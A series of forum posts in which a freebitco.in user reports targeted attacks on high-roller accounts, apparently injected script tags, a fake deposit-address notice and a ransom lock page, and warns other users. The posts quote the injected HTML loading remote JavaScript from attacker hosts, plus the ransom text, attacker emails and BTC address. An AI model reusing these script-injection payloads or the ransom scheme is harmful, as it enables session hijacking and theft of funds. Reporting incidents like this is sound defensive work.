So it looks like the second wave of attacks has been completed.
Attackers github profile has been deleted and malicious script removed from cdn site.
I believe that again it was done by the attackers to cover their tracks.
No evidence, so nothing to prove.

It's only matter of time when they strike again and whole history will come full circle.
As long as the vulnerability is not patched the attacker can exploit it whenever he wants.
Of course, he should not exaggerate so not to draw too much attention.
Small group of high rollers will be attacked again, they will report an issue, but no one will believe it. They will be accused of spreading fud/trolling etc, because other accounts will be working as usual.
Even after so many reports there are still users who are deeply convinced that issue is on clients side, that our machines got compromised/got malware...etc
It just show how this method is effective.

Of course I could be wrong, but from my point of view attackers are able to put link into particular place on fbc website.
And it's exactly:
FBC -> "REFER" tab -> "ADVANCED TRACKING USING TAGS" button -> "SELECT A TAG TO VIEW ITS STATS" and link is hidden in drop down list.
It was not visible from GUI, but it was somehow placed into html code.

Link leads to malicious script which is executed during website loading.
And because of it website content can be modified.

Not affected accounts don't have any links placed/injected into their session in that location.
Affected user i.e @Drazen2003:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
          <option value="<script src=https://cashtravel.info/forum/main.js></script>">
                <script src="https://cashtravel.info/forum/main.js"></script>
            </option>
            <option value="<script src=https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js></script>">
                <script src="https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js"></script>
            </option>
        </select>
 
Not affected user:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
        </select>

It was already mentioned, but there is quite a mess in posts.
Only small group of users where targeted - mainly high rollers.
So most of us are users whose IDs where published on leaderboard of daily jackpot, monthly wagering or referral contest.

Oh, that's new!
@Drazen2003
Attackers in your case injected another script - it's under new location and for sure code is different.
Script source code is obfuscated, so it's not easy to decode.
We can try to obfuscate using https://deobfuscate.io/ but it's still not easy to understand.

Try to block this script https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js, delete cookies or clear your browser history than log into fbc and check again.

My case was different - there was only 'cashtravel' script.
Link to my case if somebody missed it - https://bitcointalk.org/index.php?topic=5492456.0

Yes, but in my case it was different.
Please read the point 1. from  my first post in this topic.
My deposit address also has changed but after about 2 weeks backed to normal.

I believe that this whole attack campaign started in second half of March.
At that time was reading first posts about change in deposit addresses.
My account was attacked in the first wave, but now when I read about new victims(second wave?) it looks like attackers much improve themself.
Hijacking sessions, making unauthorized withdrawals and bypassing 2FA - it looks very serious.

Edit:
According to information shared from user @Drazen2003
There is completely new link injected  into his session.
New link leads to new malicious script:
https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js

I did some investigation and it looks like about 23th April started the second wave of attacks.
That day attacker created his account on github and placed there new malicious script.
After that he published it on cdn site.
Attacker profiles:
https://github.com/feleryunfbc
https://www.jsdelivr.com/package/gh/feleryunfbc/js?tab=files
 

No, nothing.
Yesterday the link was still there.
When claiming free rolls/WoFs I was always checking if it's still there.
I guess things are slowly getting sorted.
Pity, that there is absolutely no communication from fbc to community.

Link to malicious script disappeared today from my user session.
It is no longer visible in website's html code.

Today:


Before:

Sure, but by "valid ID" they just need any ID of active user with some balance.
On fbc platform user ID is just an ordinal number defining when user registered himself.
So it can be any number from 1 to number_of_all_users (i.e the famous site creator - wetsuit has ID=4 - according to his referral link)
I think attackers can hijack any user session, but by doing it they would attract too much attention.
Lots of accounts are deleted, abandoned, inactive or with too low balance to do anything.
So for these obvious reasons there is no point to attack them all.
Attackers chose only small group of active accounts and that works.

I created account here to share info about it and warn you.
From the very beginning, because of newbie rank I was accused of being troll, spreading fud etc. - that was never my intention.
I'm aware that vast majority of fbc accounts are clean and not affected - sure, but for how long...
Just be careful guys.

Hard to say, maybe in your case, at some point attackers managed to overwrite deposit address and make it fixed somewhere in website's html code.
They had customized scripts, so every case can be different.
And since fbc is not quick to act, attackers had time to adapt and improve their scripts or even improve the whole attack scenario.

I sent email about 2 weeks ago, but still waiting for response.

Yeah, I believe that only small group of high rollers were targeted or at least users whose IDs where published on leaderboard of daily jackpot, monthly wagering or referral contest.
And that's understandable - these accounts have active users and should have enough BTC balance to make a withdrawal.

Attackers managed to inject malicious script into a particular user's session (by a known ID).
In my case it was https://cashtravel.info/forum/main.js.
Now, attackers could change location of malicious script and even improve its code.

I saw that one of the Legendary user became a victim of similar attack, so maybe now this issue will get a proper attention.

No, at least not yet.
I think I don't have enough evidence to prove anything.



Yeah, since my account could be compromised will definitely not deposit there anything soon.
I have changed my password, but still have some security concerns.
For sure attacker can't withdraw anything because of 2FA.
If he managed to hijack my session he can harm me by using my balance to gamble and loose it on purpose.
I was able to withdraw my all BTC funds, but there is still quite big bag of Fun Tokens left.
For now they are locked, I will try to reach them when FUN savings matured.

Like mentioned some posts earlier I have started new topic about recent attack attempts on my fbc account.
https://bitcointalk.org/index.php?topic=5492456.0

You can find there my side of the story.

tldr:
I just wanted to inform you about these incidents. Be careful and protect your funds.
Someday it can also happen to you and to any service on the Internet.

Hi,
I would like to share my recent experience using freebitco.in.
There were some attack attempts on my account.
I have been using fbc for years and I've never had any serious problems with the platform.

So, to the point.
I have faced two issues. First one started about week ago.

1. Fake notification about change of deposit address.
There was a notification placed on the main page and looked exactly like any other notification on fbc.
You know, yellow rectangle in a frame.
Same colors, same fonts i.e:


There was an information about change in deposit address - something more or less like "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee."
By clicking on Deposit button there was indeed new bitcoin address starting with digit '3...'
It looked very convincing, but I ignored this notification because I didn't plan to make any deposit soon.

I found at least three other users on this forum who faced the same issue:
Below you can find some other user's screenshot - I have just marked parts of this false notification. It's only partially visible in the background.


According to messages from these users, they actually deposit some funds to new addressees but they were never credited to their fbc account (they even posted their User IDs, TX hashes etc.).

Like I said before, I did not pay much attention to it because I didn't plan to make deposit, but this notification was somehow added/injected into html website code.
Notification looked very convincing but I just wasn't interested with it.
I simply ignored it and I was using fbc as usual.
Beside this notification everything looked and worked as always.
As usual I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo etc.

After few days, this notification disappeared and deposit address came back to the previous one - legacy format started with '1...'
My thoughts were that they just performed roll back from this change and that's all.

On 9th April I faced second issue.

2. XSS attack?

During another session in Hi-Lo game suddenly my account has been locked.
Instead of fbc website there was a blank page with a message:
"Your account is locked. Please contact @hallohap_1 on telegram or fellowyun@proton.me email. Failure to comply will result to a lost of funds"

I was quite shocked.
I have only one account, I was never using any VPNs or bots.
As usual I was just using built-in feature "auto-bet" and that's all.

I sent a message to fellowyun@proton.me asking what happened.

After few hits of refresh button in my browser blockpage has changed to:
"Your account is locked. Please contact @hallohap_1 on telegram or bellera12@proton.me email. Failure to comply will result to a lost of funds"


So, I sent the same  message to new e-mail address.
Than started a typical ransom scheme. At this point I didn't know how attacker achieved it, so for me the threat was real.  
I've got a response:
"Your browser is hacked. Send 0.5 btc to bc1qhrdvuxrealra5xm7qsu9tyh06k3frcrzuvsms7 to unlock it. Why trust me? I cant withdraw your money because it needs otp and email. Ill wait 1hr before I drain it"

I knew that sending 0,5 btc is pointless so I started to investigate this attack.
After some time I got another message from attacker that I'm running out time.
I tried to gain some time for myself by tricking him.


I wiped my entire browser history, tried on a different browser in private/incognito mode, I changed the device to clean PC with different operating system, I even changed DNS servers - everything was exactly the same - blank page with message about locked account.
And this all happened with 2FA enabled.
Then, I started checking logs. In developer tools built in browser I saw entries about loading of a strange js script under https://cashtravel.info/forum/main.js, I blocked it with a "NoScript!" browser plugin. and after that fbc page was unlocked.
Extremely stressed, no thinking much I went straight to Withdraw button and chose Instant Method.
At that point I didn't know how attacker performed this scam, so I was afraid that he will replace withdrawal address on the fly or hijack OTP - but I had no options.
Fortunately I was able to withdraw all my BTC funds.
Instant method worked out well and after ~30min I had all my funds confirmed and stored on my wallet.

How it happened?
I'm not sure.
I have enabled 2FA, I used clean device and issue was still visible. My fbc account email is used only for fbc purpose, so there was no chance for any phishing attacks.
I also don't believe that attacker actually compromise my entire network or all devices I have. For me its impossible or at least it would cost to much effort.

From my point of view attacker found some vulnerability in fbc or 3rd party service they use and managed to exploit it.
I suppose that attacker somehow inject link to external source with malicious script.
In the source code of this malicious script there were hardcoded user IDs. He managed to hijack sessions from specific users.

Why and how I was attacked?
I believe that attacker was targeting highrollers and taking user IDs from wagering leaderboard.
For few days in a row my user ID was shown in the top10 wagering contest.

It's hard to proof now anything.
At some point script was changed and removed.
Source of one version of this script can be found under https://pastebin.ai/eo0q78pbuj
This particular script was prepared to attack user with ID 31898443 who won daily jackpot on 2024-04-08.

At present there is no any script at https://cashtravel.info/forum/main.js
I believe that attacker delete it to cover his tracks.

On my account I still have injected link to malicious script.
I have blocked it from executing but it's still present in a html code.

Ok, so since you actually asked, I will start a new topic about it and try to explain whole situation again.

I also think that it's not the right place to continue this story.
If somebody is interested with it and have any questions you can always ask me there.
Just give me some time to gather things and describe whole story from the beginning.

Like I said before, I have registered account here mainly to show what I faced.
Fortunately, I was not fooled, but the matter looked serious.

In sum up there were two attack attempts; first was the injection of fake notification that fbc deposit address has changed and second one with defaced website containing message about locked account and attempt to get ransom from unlocking it.

If you really interested in this case just try to read my posts and my conversation with other users.
I registered account here mainly to show the issue I faced.
Luckily I avoided of being scammed and I think I described quite well my side of the story.
In my posts you can find a lot of screenshots including defaced website, emails from scammers, proof of injected malicious script etc.
Some posts above you can even find a source code of the script used to attack some other user.
I didn't deposit any funds to scammers, but other users actually posted massages with all information you mentioned (TX hash, deposit addresses, User IDs) - but this is in another topic about fbc - https://bitcointalk.org/index.php?topic=319540.9100

No, it started to work when I blocked the malicious script injected into my account session.
It also worked when I unblocked the script, but its code was already changed to target another user.
No matter on what device/software.  I had also 2FA enabled.


At present script is removed from external source, but it could also be done by attacker himself just to cover his tracks.
For now his method is burnt, but he can try again once the dust has settled.
New script, new link to malware etc.
When logged, I still have link to malicious script side-loaded into html source of a main fbc page.
It's blocked from executing, but it's still there.

Be careful guys.
Customer service is almost impossible to reach, so if you ended up with an issue, you're mostly on your own.
We don't know the real scale of this attack, because majority of fbc user don't even know about existence of this forum.

As far as I can see, malicious code is added to main site document named "?op=home"

Below some screenshots how it looks on my side.




Edit:
And also in default index document.

Oh, that's very interesting finding.
My account has different ID, but I believe that scammers have changed the script few hours ago to attack another active user.

When issue was visible I saw that fbc page was loading and after short period of time it's getting covered by some kind of blockpage.
Like message about locked account is in the foreground and a normal fbc webpage is in the background. I tried to blocked it by adding filter to "ublock" plugin but without success.
Then a tried to check network logs from developer tools built-in browser.
I also saw this suspicious url bitwrecked.
 
Unfortunately I didn't took any usefull screenshots or save any logs.
I know that now it's impossible to proof anything.

At some point when I had these two scripts blocked it started to work


But now even with allowed these two scripts to run, page is loading successfully without any concerns.
It looks and works as usual.

I was in the top10 daily jackpot leaderboards for a few days in a row.  It could be it.

It just stops auto-roll when you hit 98>= satoshi profit during your rolling session.
To get bonus balance transferred do you "main balance" you have to wager a specific amount of BTC.

Yeah, I know. Like I said before I managed to withdraw all BTC funds from my account.
I have also some quite big bag of FUN token there, but it's locked. I will try to use them when FUN savings matured.

Now, fbc page is working as normal, but in case that my account can be compromised I will not use it anymore.
Pity, because I have unlocked all premium benefits and I will have to start over again.

Anyway, it could have ended much worse.

I checked this on different clean device which was never used for fbc (different OS, different browser, different DNS servers) and still my session was somehow hijacked.
It's also possible that my router is compromised but it's highly unlikely.
From my point of view.. I know it's hard to believe and even I have doubts, but it looks like fbc had some security breach or some 3rd party service they were using. Attackers were targeting only some small group of users (including me) and they managed do inject malicious script only for some accounts.
For a week or so I was also getting notifications about change in deposit address (change to P2SH segwit addresses started with 3...), but I ignored that because I didn't plan to make deposits.
Everything was looking legitimate. This message was looking exactly the same as any other notification on fbc site. Same fonts, same colors, etc.

Now everything works as usual, so I guess I will never know what happened.